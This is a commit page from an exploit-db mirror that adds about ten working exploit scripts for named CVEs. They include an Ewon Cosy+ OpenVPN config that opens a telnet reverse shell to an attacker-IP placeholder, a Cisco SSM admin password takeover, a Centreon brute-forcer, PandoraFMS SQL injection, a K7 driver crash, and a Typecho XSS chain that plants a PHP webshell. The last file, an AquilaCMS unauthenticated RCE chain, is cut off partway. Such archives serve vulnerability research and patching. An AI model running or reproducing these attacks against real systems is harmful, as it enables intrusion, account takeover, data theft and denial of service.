bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-12 00:01:16 +00:00
commit 70472131cc
12 changed files with 1275 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

53
exploits/multiple/hardware/52160.py Executable file
View file

@ -0,0 +1,53 @@
Hey,
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.
Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
paramaters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
PoC:
# Exploit Title: Ewon Cosy+ Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896
import socket
import subprocess
import time
def configcreator(file_path):
with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
l3st(port): server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
True: data = client_socket.recv(1024) if not data: break
print(data.decode()) client_socket.close() server_socket.close() if name ==
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
import start_listener; start_listener({port})']) time.sleep(2)
create_malicious_openvpn_config(config) print(f" - --> config_created
{config}")
GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC

92
exploits/multiple/remote/52158.py Executable file
View file

@ -0,0 +1,92 @@
# Title: K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference
# Date: 13.08.2024
# Author: M. Akil Gündoğan
# Vendor Homepage: https://k7computing.com/
# Version: < v17.0.2019
# Tested on: Windows 10 Pro x64
# CVE ID: CVE-2024-36424
# Vulnerability Description:
--------------------------------------
In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.
# Technical details and step by step Proof of Concept's (PoC):
--------------------------------------
1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.
2 - Compile the attached PoC code written in C++ as release on VS 2022.
3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.
# Impact:
--------------------------------------
An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.
# Advisories:
--------------------------------------
K7 Computing recommends that all customers update their products to the corresponding versions shown below:
K7 Ultimate Security (17.0.2019 or Higher)
# Timeline:
--------------------------------------
- 16.05.2024 - Vulnerability reported.
- 05.08.2024 - Vendor has fixed the vulnerability.
- 13.08.2024 - Released.
# References:
--------------------------------------
- Vendor: https://www.k7computing.com
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
- Repository: https://github.com/secunnix/CVE-2024-36424
# PoC Code (C++):
-------------------------------------------------------------------------------------------------------------------------
/*
# Usage: Only compile it and run, boooom :)
*/
#include <windows.h>
#include <iostream>
const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014
int main() {
std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
HANDLE hDevice = CreateFile(driverDevice.c_str(),
GENERIC_READ | GENERIC_WRITE,
0,
nullptr,
OPEN_EXISTING,
0,
nullptr);
if (hDevice == INVALID_HANDLE_VALUE) {
std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
return 1;
}
void* inputBuffer = nullptr; // Null input buffer
DWORD inputBufferSize = 0;
DWORD bytesReturned;
BOOL result = DeviceIoControl(hDevice,
ioCTL,
inputBuffer,
inputBufferSize,
nullptr,
0,
&bytesReturned,
nullptr);
if (!result) {
std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
}
CloseHandle(hDevice);
return 0;
}

118
exploits/multiple/webapps/52155.py Executable file
View file

@ -0,0 +1,118 @@
# Exploit Title: Cisco SSM On-Prem; Account Takeover (CVE-2024-20419)
# Google Dork: N/A
# Date: 21/07/2024
# Exploit Author: Mohammed Adel
# Vendor Homepage: https://www.cisco.com
# Software Link:
https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html
# Version: 8-202206 and earlier
# Tested on: Kali Linux
# CVE : CVE-2024-20419
# Security Advisory:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy
# Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419
import requests, sys
from urllib.parse import unquote
# Suppress SSL warnings
requests.packages.urllib3.disable_warnings()
Domain = sys.argv[1] # Domain, https://0xpolar.com:8443
Username = sys.argv[2] # Username, by default its [admin]
password = "Polar@123456780"
print("[*] Cisco Smart Software Manager On-Prem")
print("[*] Account Takeover Exploit")
print("[*] Target: "+Domain)
print("[*] Username: "+Username)
print("\n")
print("[*] Getting Necessary Tokens..")
get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar"
response = requests.get(get_url, verify=False)
def get_cookie_value(headers, cookie_name):
cookies = headers.get('Set-Cookie', '').split(',')
for cookie in cookies:
if cookie_name in cookie:
parts = cookie.split(';')
for part in parts:
if cookie_name in part:
return part.split('=')[1].strip()
return None
set_cookie_headers = response.headers.get('Set-Cookie', '')
xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN')
lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session')
if xsrf_token:
xsrf_token = unquote(xsrf_token)
if not lic_engine_session or not xsrf_token:
print("Required cookies not found in the response.")
else:
print("[+] lic_engine_session: "+lic_engine_session)
print("[+] xsrf_token: "+xsrf_token)
print("\n[*] Generating Auth Token")
post_url = Domain+"/backend/reset_password/generate_code"
headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Xsrf-Token': xsrf_token,
'Sec-Ch-Ua': '',
'Sec-Ch-Ua-Mobile': '?0',
}
cookies = {
'_lic_engine_session': lic_engine_session,
'XSRF-TOKEN': xsrf_token,
}
payload = {
'uid': Username
}
post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False)
post_response_json = post_response.json()
auth_token = post_response_json.get('auth_token')
if not auth_token:
print("auth_token not found in the response.")
else:
print("[+] Auth Token: "+auth_token)
print("\n[*] Setting Up a New Password")
final_post_url = Domain+"/backend/reset_password"
final_headers = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'X-Xsrf-Token': xsrf_token,
}
final_cookies = {
'_lic_engine_session': lic_engine_session,
'XSRF-TOKEN': xsrf_token,
}
final_payload = {
'uid': Username,
'auth_token': auth_token,
'password': password,
'password_confirmation': password,
'common_name': ''
}
final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False)
response_text = final_post_response.text
if "OK" in response_text:
print("[+] Password Successfully Changed!")
print("[+] Username: "+Username)
print("[+] New Password: "+password)
else:
print("[!] Something Went Wrong")
print(response_text)

29
exploits/php/webapps/52154.NA Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Blind SQL Injection - FengOffice
# Date: 7/2024
# Exploit Author: Andrey Stoykov
# Version: 3.11.1.2
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
SQL Injection:
1. Login to application
2. Click on "Workspaces"
3. Copy full URL
4. Paste the HTTP GET request into text file
5. Set the injection point to be in the "dim" parameter value
6. Use SQLMap to automate the process
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim =
--fingerprint
[...]
[12:13:03] [INFO] confirming MySQL
[12:13:04] [INFO] the back-end DBMS is MySQL
[12:13:04] [INFO] actively fingerprinting MySQL
[12:13:05] [INFO] executing MySQL comment injection fingerprint
web application technology: Apache
back-end DBMS: active fingerprint: MySQL >=3D 5.7
comment injection fingerprint: MySQL 5.7.37
[...]

101
exploits/php/webapps/52156.py Executable file
View file

@ -0,0 +1,101 @@
#!/usr/bin/env python3
# Tested on Centreon API 19.04.0
# Centreon 19.04 - Login Password Bruteforcer
# Written on 6 Nov 2019
# Referencing API Authentication of the Centreon API document
# Author: st4rry
# centbruteon.py
# Centreon Download Link: https://download.centreon.com/#version-Older
# Dependencies: sys, requests, argparse, termcolor, os
import sys
import requests
import argparse
from termcolor import colored
import os
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='host', help='Define your target URL', required=True)
parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80)
parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP')
parser.add_argument('-l', dest='username', help='Specific username')
parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist')
parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True)
parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification')
parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle')
if len(sys.argv) == 1:
parser.print_help(sys.stderr)
sys.exit(1)
args = parser.parse_args()
protocol = 'https' if args.https else 'http'
server = f"{protocol}://{args.host}:{args.port}"
user = args.username
passfile = args.passwfile.read().splitlines()
userfile = args.userfile
dirlo = '/centreon/api/index.php?action=authenticate'
verify_ssl = not args.insecure
if args.ca_bundle:
verify_ssl = args.ca_bundle
if user:
brute_force_single_user(server, user, passfile, dirlo, verify_ssl)
elif userfile:
usrwl = userfile.read().splitlines()
brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl)
else:
print(colored('Something went wrong!', 'red'))
sys.exit(1)
def brute_force_single_user(server, user, passfile, dirlo, verify_ssl):
for password in passfile:
data = {'username': user, 'password': password}
r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
try:
print('Processing...')
print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
colored(' Username: ', 'yellow') + colored(user, 'yellow') +
colored(' Password: ', 'yellow') + colored(password, 'yellow'))
if r.status_code == 200:
print(colored('Credentials found: username: ', 'green') + colored(user, 'green') +
colored(' password: ', 'green') + colored(password, 'green') +
colored(' server: ', 'green') + colored(server, 'green'))
print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
print('\n')
break
else:
print(colored('403 - Unauthenticated!', 'red'))
except IndexError:
print(colored('Something went wrong', 'red'))
def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl):
for usr in usrwl:
for password in passfile:
data = {'username': usr, 'password': password}
r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl)
try:
print('Processing...')
print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') +
colored(' Username: ', 'yellow') + colored(usr, 'yellow') +
colored(' Password: ', 'yellow') + colored(password, 'yellow'))
if r.status_code == 200:
print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') +
colored(' password: ', 'green') + colored(password, 'green') +
colored(' server: ', 'green') + colored(server, 'green'))
print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan'))
print('\n')
else:
print(colored('403 - Unauthenticated!', 'red'))
except IndexError:
print(colored('Something went wrong', 'red'))
if __name__ == '__main__':
main()

136
exploits/php/webapps/52157.py Executable file
View file

@ -0,0 +1,136 @@
# Exploit Title: PandoraFMS console v7.0NG.772 - SQL Injection (Authenticated)
# Date: 21/11/2023
# Exploit Author: Osama Yousef
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz
# Version: v7.0NG.772
# Tested on: Linux
# CVE : CVE-2023-44088
import re, requests, argparse, string, random, base64
import urllib3
import html
headers = {
'Cache-Control': 'max-age=0',
'Origin': '',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
'Accept': '*/*',
'Referer': ''
}
def login(session, url, username, password):
res = session.get(url)
csrf = retrieve_csrftoken(res.text)
url+= '?login=1'
payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}"
res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'})
if 'User is blocked' in res.text:
print("Login Failed!")
exit(1)
def exploit(session, url, imagepath, query):
url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data"
name = random_id(10)
payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query)
payload=payload.replace(' ', '\t')
files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')}
# Create a reference to the original _make_request method
urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request
# Replace the _make_request method with the custom_make_request function
urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request
res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'})
if 'Created successfully' not in res.text:
print("Failed to create a visual console!")
exit(1)
url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder"
res = session.get(url2)
x = re.search('(?:<a href=".*">)'+name, res.text)
match = x.group()
url3 = match.lstrip("<a href=")
url3 = url3.split('"')[1]
url3 = url3.split("?")[1]
url3 = html.unescape(url3)
url4 = url+ "?" + url3
res = session.get(url4)
x = re.search('(?:var props = {"autoAdjust":true,"backgroundColor":".*","backgroundImage")', res.text)
match = x.group()
output = match.lstrip('var props = {"autoAdjust":true,"backgroundColor":"')
output = output.split('","backgroundImage')[0]
print("Query output: {}".format(output))
def retrieve_csrftoken(response):
x = re.search('(?:<input id="hidden-csrf_code" name="csrf_code" type="hidden" value=")[a-zA-Z0-9]*(?:")', response)
match = x.group()
csrf = match.lstrip('<input id="hidden-csrf_code" name="csrf_code" type="hidden" value="').rstrip('"')
print("CSRF: {}".format(csrf))
return csrf
def random_id(len):
chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
return ''.join(random.choice(chars) for _ in range(len))
def custom_make_request(self, conn, method, url, timeout=urllib3.connectionpool._Default, chunked=False, **httplib_request_kw):
body = httplib_request_kw['body']
if body:
body = body.replace(b"%09", b"\t"*3)
httplib_request_kw['body'] = body
return self._original_make_request(conn, method, url, timeout=timeout, chunked=chunked, **httplib_request_kw)
def main():
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--target", required=True, help="Target URI")
ap.add_argument("-u", "--username", required=True, help="Username")
ap.add_argument("-p", "--password", required=True, help="Password")
ap.add_argument("-i", "--image", required=True, help="Image path")
ap.add_argument("-q", "--query", required=True, help="SQL Query to execute")
ap.add_argument("-x", "--proxy", required=False, help="Proxy Configuration (e.g., http://127.0.0.1:8080/)")
args = vars(ap.parse_args())
session = requests.Session()
url = args['target']
if 'pandora_console' not in url:
if not url.endswith('/'):
url += '/'
url += 'pandora_console/'
headers['Origin'] = args['target']
headers['Referer'] = args['target']
session.headers.update(headers)
proxies = {}
if args['proxy'] is not None:
if 'https' in args['proxy']:
proxies['https'] = args['proxy']
else:
proxies['http'] = args['proxy']
session.proxies.update(proxies)
login(session, url, args['username'], args['password'])
exploit(session, url, args['image'], args['query'])
if __name__=='__main__':
main()

24
exploits/php/webapps/52159.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: XSS Vulnerability in Online Railway Reservation System 1.0
# Date: 2024-08-15
# Exploit Author: Raj Nandi
# Vendor Homepage: https://codeastro.com/
# Software Link:
https://codeastro.com/online-railway-reservation-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Any OS
# CVE: CVE-2024-7815
## Description:
A Cross-Site Scripting (XSS) vulnerability exists in [Application
Name/Version]. This vulnerability allows an attacker to inject and execute
arbitrary JavaScript code within the context of the user's browser session.
## Proof of Concept (PoC):
1. Navigate to [vulnerable page or input field].
2. Input the following payload: `<script>alert(document.cookie)</script>`
3. Upon execution, the script will trigger and display the user's cookies
in an alert box.
## Mitigation:
To prevent this vulnerability, ensure that all user inputs are properly
sanitized and validated before being reflected back on the webpage.

182
exploits/php/webapps/52161.go Executable file
View file

@ -0,0 +1,182 @@
// Exploit Title: Typecho <= 1.3.0 Race Condition
// Google Dork: intext:"Powered by Typecho" inurl:/index.php
// Date: 18/08/2024
// Exploit Author: Michele 'cyberaz0r' Di Bonaventura
// Vendor Homepage: https://typecho.org
// Software Link: https://github.com/typecho/typecho
// Version: 1.3.0
// Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
// CVE: CVE-2024-35539
// For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
package main
import (
"bytes"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/robertkrimen/otto"
)
var (
c int32 = 0
commentsPostInterval int64 = 60
maxThreads int = 1000
wg sync.WaitGroup
userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
client *http.Client = &http.Client{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
)
func getJSFunction(u string) string {
req, err := http.NewRequest("GET", u, nil)
if err != nil {
fmt.Println("[X] Error creating initial request:", err)
return ""
}
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending initial request:", err)
return ""
}
buf := new(bytes.Buffer)
buf.ReadFrom(resp.Body)
body := buf.String()
if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") {
fmt.Println("[X] Error finding JavaScript function")
return ""
}
jsFunction := strings.Split(body, "input.value = (")[1]
jsFunction = strings.Split(jsFunction, ")();;")[0]
return jsFunction
}
func executeJavaScript(jsFunctionName string, jsFunctionBody string) string {
vm := otto.New()
_, err := vm.Run(jsFunctionBody)
if err != nil {
fmt.Println("[X] Error executing JavaScript function:", err)
return ""
}
result, err := vm.Call(jsFunctionName, nil)
if err != nil {
fmt.Println("[X] Error calling JavaScript function:", err)
return ""
}
returnValue, err := result.ToString()
if err != nil {
fmt.Println("[X] Error converting JavaScript result to string:", err)
return ""
}
return returnValue
}
func spamComments(u string, formToken string) {
timestamp := time.Now().Unix()
for {
i := 0
for time.Now().Unix() < timestamp-1 {
time.Sleep(250 * time.Millisecond)
fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1)
}
fmt.Printf("\n")
for time.Now().Unix() < timestamp+2 {
if i < maxThreads {
wg.Add(1)
go spamRequest(u, formToken, i)
i++
}
}
wg.Wait()
fmt.Printf("\n[+] Successfully spammed %d comments\n", c)
timestamp = time.Now().Unix() + commentsPostInterval
}
}
func spamRequest(u string, formToken string, i int) {
fmt.Printf("\r[*] Spamming comment request %d ", i)
defer wg.Done()
formData := url.Values{}
formData.Set("_", formToken)
formData.Set("author", fmt.Sprintf("user_%d", i))
formData.Set("mail", fmt.Sprintf("user%d@test.example", i))
formData.Set("text", fmt.Sprintf("Hello from user_%d", i))
req, err := http.NewRequest("POST", u+"comment", nil)
if err != nil {
return
}
req.Header.Set("Referer", u)
req.Header.Set("User-Agent", userAgent)
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
req.Body = io.NopCloser(strings.NewReader(formData.Encode()))
resp, err := client.Do(req)
if err != nil {
return
}
if resp.StatusCode == 302 {
atomic.AddInt32(&c, 1)
}
defer resp.Body.Close()
}
func main() {
if len(os.Args) != 2 {
fmt.Println("Usage: go run CVE-2024-35538.go <POST_URL>")
return
}
fmt.Println("[+] Starting Typecho <= 1.3.0 Race Condition exploit (CVE-2024-35539) by cyberaz0r")
targetUrl := os.Args[1]
fmt.Println("[+] Spam target:", targetUrl)
fmt.Println("[*] Getting JavaScript function to calculate form token...")
jsFunction := getJSFunction(targetUrl)
if jsFunction == "" {
fmt.Println("[-] Could not get JavaScript function, exiting...")
return
}
fmt.Println("[*] Evaluating JavaScript function to calculate form token...")
formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1))
if formToken == "" {
fmt.Println("[-] Could not get form token, exiting...")
return
}
fmt.Printf("[+] Form token: %s", formToken)
spamComments(targetUrl, formToken)
}

254
exploits/php/webapps/52162.go Executable file
View file

@ -0,0 +1,254 @@
// Exploit Title: Typecho <= 1.3.0 Stored Cross-Site Scripting (XSS)
// Google Dork: intext:"Powered by Typecho" inurl:/index.php
// Date: 18/08/2024
// Exploit Author: Michele 'cyberaz0r' Di Bonaventura
// Vendor Homepage: https://typecho.org
// Software Link: https://github.com/typecho/typecho
// Version: 1.3.0
// Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
// CVE: CVE-2024-35540
// For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
package main
import (
"bufio"
"bytes"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"fmt"
"net/http"
"net/url"
"os"
"strings"
"time"
)
var (
postTitle string = "Reflected XSS PoC"
postText string = "Hey admin! Look at the draft of this blog post, can I publish it?"
userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
client *http.Client = &http.Client{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
)
func getEditUrl(u string, cookies string) string {
req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil)
if err != nil {
fmt.Println("[X] Error creating initial request:", err)
return ""
}
req.Header.Set("Cookie", cookies)
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending initial request:", err)
return ""
}
buf := new(bytes.Buffer)
buf.ReadFrom(resp.Body)
body := buf.String()
if !strings.Contains(body, "<form action=\"") {
fmt.Println("[X] Error finding post edit URL")
return ""
}
editUrl := strings.Split(body, "<form action=\"")[1]
editUrl = strings.Split(editUrl, "\"")[0]
return editUrl
}
func generateRandomBytes() string {
bytes := make([]byte, 64)
rand.Read(bytes)
return fmt.Sprintf("%x", sha256.Sum256(bytes))
}
func getJsCode(password string) string {
phpPayload := `
header("X-Random-Token: " . md5(uniqid()));
if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") {
if (isset($_POST["action"])) {
system($_POST["action"]);
exit;
}
}
`
phpPayload = fmt.Sprintf(phpPayload, password)
jsPayload := `
var i = document.createElement('iframe');
i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php';
i.style.display = 'none';
document.body.appendChild(i);
setTimeout(() => {
var textarea = i.contentWindow.document.getElementById('content');
if (textarea.value.includes(payload))
return;
textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload);
var form = i.contentWindow.document.getElementById('theme').submit();
}, 200);
`
return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload)
}
func generatePayload(jsCode string) string {
remainder := len(jsCode) % 3
if remainder != 0 {
jsCode += strings.Repeat(" ", 3-remainder)
}
jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode))
return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded)
}
func createPost(u string, cookies string, payload string) string {
formData := url.Values{}
formData.Set("title", postTitle)
formData.Set("text", payload+"\n"+postText)
formData.Set("do", "save")
formData.Set("markdown", "1")
formData.Set("category%5B%5D", "1")
formData.Set("allowComment", "1")
formData.Set("allowPing", "1")
formData.Set("allowFeed", "1")
formData.Set("dst", "60")
formData.Set("timezone", "7200")
req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
if err != nil {
fmt.Println("[X] Error creating malicious post creation request:", err)
return ""
}
req.Header.Set("Cookie", cookies)
req.Header.Set("User-Agent", userAgent)
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1))
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending malicious post creation request:", err)
return ""
}
defer resp.Body.Close()
return resp.Header.Get("Location")
}
func checkInjected(u string) bool {
req, err := http.NewRequest("HEAD", u, nil)
if err != nil {
return false
}
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
return false
}
return resp.Header.Get("X-Random-Token") != ""
}
func readInput() string {
scanner := bufio.NewScanner(os.Stdin)
if scanner.Scan() {
return scanner.Text()
}
return ""
}
func interactiveShell(u string, password string) {
for {
fmt.Print("$ ")
cmd := readInput()
formData := url.Values{}
formData.Set("CSRFToken", password)
formData.Set("action", cmd)
req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
if err != nil {
fmt.Println("[X] Error creating shell request:", err)
continue
}
req.Header.Set("User-Agent", userAgent)
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending shell request:", err)
continue
}
buf := new(bytes.Buffer)
buf.ReadFrom(resp.Body)
body := buf.String()
fmt.Println(body)
}
}
func main() {
if len(os.Args) != 3 {
fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>")
os.Exit(1)
}
fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r")
targetUrl := os.Args[1]
cookies := os.Args[2]
fmt.Println("[*] Getting post edit URL with CSRF token...")
editUrl := getEditUrl(targetUrl, cookies)
if editUrl == "" {
fmt.Println("[-] Could not get post edit URL, exiting...")
return
}
fmt.Println("[+] Edit URL:", editUrl)
password := generateRandomBytes()
fmt.Println("[+] Generated password to access the webshell: ", password)
fmt.Println("[*] Generating JavaScript code to inject webshell...")
jsCode := getJsCode(password)
payload := generatePayload(jsCode)
fmt.Println("[*] Creating malicious post...")
postUrl := createPost(editUrl, cookies, payload)
if postUrl == "" || postUrl == "/" {
fmt.Println("[-] Could not create malicious post, exiting...")
return
}
previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1)
fmt.Println("[+] Malicious post created successfully!")
fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl)
fmt.Println("[*] Waiting for the admin to visit the preview URL...")
for !checkInjected(targetUrl) {
time.Sleep(1 * time.Second)
}
fmt.Println("[+] Webshell injected successfully!")
fmt.Println("[+] Enjoy your shell ;)\n")
interactiveShell(targetUrl, password)
}

197
exploits/php/webapps/52164.py Executable file
View file

@ -0,0 +1,197 @@
# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) (Unauthenticated)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573
import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap
def unescape_special_characters(email):
return (
email.replace("[$]", "$")
.replace("[*]", "*")
.replace("[+]", "+")
.replace("[-]", "-")
.replace("[.]", ".")
.replace("[?]", "?")
.replace(r"[\^]", "^")
.replace("[|]", "|")
)
def get_user_emails():
valid_characters = list(
string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
emails_found = []
next_emails = ["^"]
while next_emails:
prev_emails = next_emails
next_emails = []
for email in prev_emails:
found = False
for ch in valid_characters:
data = {"email": f"{email + ch}.*"}
res = requests.put(f"{args.url}/api/v2/user", json=data)
if json.loads(res.text)["code"] == "UserAlreadyExist":
next_emails.append(email + ch)
found = True
if not found:
emails_found.append(email[1:])
print(f"[+] {unescape_special_characters(email[1:])}")
return emails_found
def reset_password(email):
data = {"email": email}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
data = {"token": {"$ne": None}, "password": args.password}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
print(f"[+] {unescape_special_characters(email)} : {args.password}")
def get_admin_auth_token(emails):
for email in emails:
data = {"username": email, "password": args.password}
res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
if res.status_code == 200:
